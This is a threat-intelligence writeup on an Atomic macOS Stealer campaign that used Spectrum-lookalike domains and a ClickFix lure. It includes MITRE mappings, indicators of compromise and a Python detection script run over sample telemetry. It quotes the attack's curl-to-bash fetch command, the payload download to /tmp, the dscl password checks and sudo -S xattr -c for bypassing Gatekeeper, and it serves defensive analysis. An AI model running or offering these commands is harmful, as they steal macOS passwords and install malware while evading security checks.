A new Atomic macOS Stealer (AMOS) campaign uses typo-squatted domains impersonating Spectrum to deliver platform-specific payloads; macOS visitors are tricked into running a shell script that harvests their system password before fetching the stealer itself. The campaign is attributed to Russian-speaking cybercriminals on the basis of source-code comments and relies on a multi-platform ClickFix-style social-engineering lure whose delivery logic is carelessly implemented. #AtomicMacOSStealer #SpectrumTyposquatting #RussianCybercriminals
Keypoints
- The campaign uses typo-squatted Spectrum domains and a fake verification page (ClickFix) to lure victims into copying and executing attacker-supplied commands.
- Different payloads are delivered based on the victim’s operating system, with macOS users receiving a malicious shell script to harvest passwords.
- The macOS script prompts the user for the system password in a loop, verifies each attempt locally with dscl . -authonly, writes the correct password to /tmp/.pass, then downloads an AMOS variant to /tmp/update and executes it.
- Russian-language comments in the source code indicate involvement of Russian-speaking threat actors.
- The delivery site's logic contains errors, such as instructions that do not match the detected platform, indicating hastily assembled infrastructure.
- The script relies on native macOS utilities rather than custom tooling: dscl to validate the captured password, sudo -S to consume it from stdin and run as root, and xattr -c to strip the quarantine attribute so Gatekeeper never inspects the downloaded payload. Because these are signed system binaries, the activity blends in with ordinary administration.
- Compromised credentials pose risks of corporate system access, lateral movement, and facilitation of further intrusions like ransomware attacks.
MITRE Techniques
- [T1056.002] Input Capture: GUI Input Capture – The script impersonates a legitimate credential prompt and keeps asking for the user's password until it validates (“Continuously prompts ‘System Password:’ until correct password entered”). This is credential capture from the victim, not brute force (T1110): the user, not the malware, supplies the guesses.
- [T1059.004] Command and Scripting Interpreter: Unix Shell – The ClickFix lure has the victim run a one-liner that pipes a remote script into Bash: /bin/bash -c "$(curl -fsSL https://applemacios[.]com/getrur/install.sh)".
- [T1553.001] Subvert Trust Controls: Gatekeeper Bypass – After download, the script runs sudo -S xattr -c on the payload, clearing its extended attributes (including com.apple.quarantine) so Gatekeeper does not inspect it; the captured password is fed to sudo on stdin (“sudo -S xattr -c to bypass macOS security”). The preceding dscl . -authonly call only confirms that the captured password is valid (“Uses dscl . -authonly to verify the password”).
- [T1078] Valid Accounts – The validated password is stored in /tmp/.pass and reused locally for sudo (“Saves the valid password to /tmp/.pass file”); the same credential lets the operators act as the victim's legitimate account afterwards.
- [T1105] Ingress Tool Transfer – Downloads additional malicious payloads after initial infection (“Downloads Payload: curl -o /tmp/update https://applemacios[.]com/getrur/update”).
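The behaviours listed above (curl-to-bash execution, repeated dscl . -authonly checks, a hidden credential file in /tmp, a payload fetched to /tmp, and sudo -S xattr -c) are individually noisy but distinctive in combination. The following Python is an added detection example written for this page, not code from the original report or from the malware: it runs a small set of regex rules over constructed process/file telemetry and raises an alert when several rules fire within one session. The event schema (ts, sid, type, cmd, path) and the sample events are assumptions standing in for whatever an EDR actually emits.

```python
"""Behavioural detection for the AMOS ClickFix chain described above.

Added example: the event format and sample telemetry below are constructed
for illustration and are not from the original report or a real EDR.
"""
import re
from collections import defaultdict

# Constructed telemetry: one dict per event. "sid" is an assumed
# session/process-tree identifier the EDR would supply.
SAMPLE_EVENTS = [
    {"ts": 100, "sid": "A", "type": "exec",
     "cmd": '/bin/bash -c "$(curl -fsSL https://applemacios.com/getrur/install.sh)"'},
    {"ts": 103, "sid": "A", "type": "exec", "cmd": "dscl . -authonly alice wrongpass"},
    {"ts": 105, "sid": "A", "type": "exec", "cmd": "dscl . -authonly alice hunter2"},
    {"ts": 105, "sid": "A", "type": "file_write", "path": "/tmp/.pass"},
    {"ts": 106, "sid": "A", "type": "exec",
     "cmd": "curl -o /tmp/update https://applemacios.com/getrur/update"},
    {"ts": 107, "sid": "A", "type": "exec", "cmd": "sudo -S xattr -c /tmp/update"},
    # Benign admin session: a lone quarantine removal on a downloaded installer.
    {"ts": 200, "sid": "B", "type": "exec",
     "cmd": "xattr -d com.apple.quarantine /Users/alice/Downloads/tool.pkg"},
    {"ts": 300, "sid": "C", "type": "exec", "cmd": "brew install jq"},
]

# Each rule maps to one step of the chain; the `sh -c "$(curl ...)"` and
# `curl ... | sh` forms are both covered by the ClickFix rule.
RULES = {
    "clickfix_curl_to_shell": re.compile(
        r"\b(ba)?sh\s+-c\s+.*\$\(\s*curl\b|curl\b.*\|\s*(ba)?sh\b"),
    "local_password_check": re.compile(r"\bdscl\s+\.\s+-authonly\b"),
    "quarantine_strip": re.compile(r"\bxattr\s+(-c|-d\s+com\.apple\.quarantine)\b"),
    "sudo_stdin_password": re.compile(r"\bsudo\s+-S\b"),
    "payload_to_tmp": re.compile(r"\bcurl\b.*\s-o\s+/tmp/\S+"),
}
HIDDEN_TMP_FILE = re.compile(r"^/tmp/\.[^/]+$")  # e.g. /tmp/.pass


def match_event(ev):
    """Return the set of rule names a single event satisfies."""
    hits = set()
    if ev["type"] == "exec":
        for name, rx in RULES.items():
            if rx.search(ev["cmd"]):
                hits.add(name)
    elif ev["type"] == "file_write" and HIDDEN_TMP_FILE.match(ev["path"]):
        hits.add("hidden_tmp_credential_file")
    return hits


def correlate(events, window=300, min_rules=3):
    """Alert on sessions where >= min_rules distinct rules fire within `window` seconds.

    Requiring several rules keeps a lone `xattr -d com.apple.quarantine`
    (common legitimate admin activity) below the alert threshold.
    """
    by_sid = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        by_sid[ev["sid"]].append(ev)

    alerts = []
    for sid, evs in by_sid.items():
        for i, start in enumerate(evs):
            names = set()
            for ev in evs[i:]:
                if ev["ts"] - start["ts"] > window:
                    break
                names |= match_event(ev)
            if len(names) >= min_rules:
                alerts.append({"sid": sid, "first_ts": start["ts"],
                               "rules": sorted(names)})
                break  # one alert per session is enough
    return alerts


if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(f"ALERT session={alert['sid']} t={alert['first_ts']} "
              f"rules={', '.join(alert['rules'])}")
```

With the default threshold only session A is flagged; the benign xattr call in session B matches one rule and stays silent. Lowering min_rules to 1 turns the rules into plain IOC-style matches, which is useful for hunting but too noisy for alerting.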
Indicators of Compromise
- [Domain] ClickFix delivery and C2 infrastructure – panel-spectrum[.]net, spectrum-ticket[.]net, cf-verifi.pages[.]dev, applemacios[.]com, rugmel[.]cat
- [File Hash] AMOS variant malware file (MD5) – eaedee8fc9fe336bcde021bf243e332a
- [URL] Contacted malicious URLs – https://cf-verifi.pages[.]dev/i.txt, https://applemacios[.]com/getrur/install.sh, https://applemacios[.]com/getrur/update